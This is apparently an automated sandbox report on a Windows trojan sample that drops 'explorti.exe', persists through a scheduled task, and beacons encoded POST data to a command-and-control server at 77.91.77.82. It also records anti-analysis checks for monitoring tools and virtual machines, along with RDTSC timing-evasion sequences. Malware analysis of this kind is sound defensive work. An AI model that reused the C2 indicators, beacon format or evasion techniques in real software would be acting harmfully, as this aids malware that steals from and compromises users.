Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View IP Address: 77.91.77.82 77.91.77.82
Source: Joe Sandbox View ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00E9BD30 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_00E9BD30
Source: unknown HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php02k02k02k02k02k02k
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpC
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpM
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpT
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpW
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpa
Source: explorti.exe, 00000007.00000002.2880581504.00000000006FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpft
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
Source: explorti.exe, 00000007.00000002.2880581504.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpu

System Summary

Source: gNo9ad9KO4.exe Static PE information: section name:
Source: gNo9ad9KO4.exe Static PE information: section name: .idata
Source: gNo9ad9KO4.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00E94CD0 7_2_00E94CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ED3048 7_2_00ED3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00E9E9B0 7_2_00E9E9B0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EC7D63 7_2_00EC7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ED6EE9 7_2_00ED6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00E94AD0 7_2_00E94AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ED763B 7_2_00ED763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ED2BB0 7_2_00ED2BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ED775B 7_2_00ED775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ED8700 7_2_00ED8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: String function: 00EA7840 appears 32 times
Source: gNo9ad9KO4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: gNo9ad9KO4.exe Static PE information: Section: ZLIB complexity 0.9984631147540983
Source: gNo9ad9KO4.exe Static PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9984631147540983
Source: explorti.exe.0.dr Static PE information: Section: adkjkfkz ZLIB complexity 0.9944319686081694
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: gNo9ad9KO4.exe Virustotal: Detection: 51%
Source: gNo9ad9KO4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File read: C:\Users\user\Desktop\gNo9ad9KO4.exe
Source: unknown Process created: C:\Users\user\Desktop\gNo9ad9KO4.exe "C:\Users\user\Desktop\gNo9ad9KO4.exe"
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: gNo9ad9KO4.exe Static file information: File size 1894912 > 1048576
Source: gNo9ad9KO4.exe Static PE information: Raw size of adkjkfkz is bigger than: 0x100000 < 0x19d200

Data Obfuscation

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Unpacked PE file: 0.2.gNo9ad9KO4.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 1.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 2.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 7.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1d691a should be: 0x1d810c
Source: gNo9ad9KO4.exe Static PE information: real checksum: 0x1d691a should be: 0x1d810c
Source: gNo9ad9KO4.exe Static PE information: section name:
Source: gNo9ad9KO4.exe Static PE information: section name: .idata
Source: gNo9ad9KO4.exe Static PE information: section name:
Source: gNo9ad9KO4.exe Static PE information: section name: adkjkfkz
Source: gNo9ad9KO4.exe Static PE information: section name: afyvsewm
Source: gNo9ad9KO4.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: adkjkfkz
Source: explorti.exe.0.dr Static PE information: section name: afyvsewm
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EAD82C push ecx; ret 7_2_00EAD83F
Source: gNo9ad9KO4.exe Static PE information: section name: entropy: 7.988500981589288
Source: gNo9ad9KO4.exe Static PE information: section name: adkjkfkz entropy: 7.953327902515579
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.988500981589288
Source: explorti.exe.0.dr Static PE information: section name: adkjkfkz entropy: 7.953327902515579
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Boot Survival

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 361030 second address: 361038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 361038 second address: 36103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3612BA second address: 3612C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3612C0 second address: 3612C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36384F second address: 363855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 363855 second address: 363898 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jo 00007F4688C929E4h 0x00000012 pushad 0x00000013 jnl 00007F4688C929D6h 0x00000019 jo 00007F4688C929D6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F4688C929E4h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F4688C929D6h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36215D second address: 362161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 3628A6 second address: 3628AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 364CDD second address: 364CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 364CE3 second address: 364CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 364CE8 second address: 364CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 364CF1 second address: 364CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 364CF7 second address: 364CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36BFFC second address: 36C000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36C000 second address: 36C004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36C746 second address: 36C769 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4688C929E9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36C8CA second address: 36C8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4688C1B778h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36C8DA second address: 36C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36C8EE second address: 36C8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36C8F4 second address: 36C916 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jnl 00007F4688C929D6h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F4688C929D6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36DCD4 second address: 36DCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36DCD8 second address: 36DCE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36DF63 second address: 36DF67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe RDTSC instruction interceptor: First address: 36DF67 second address: 36DF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
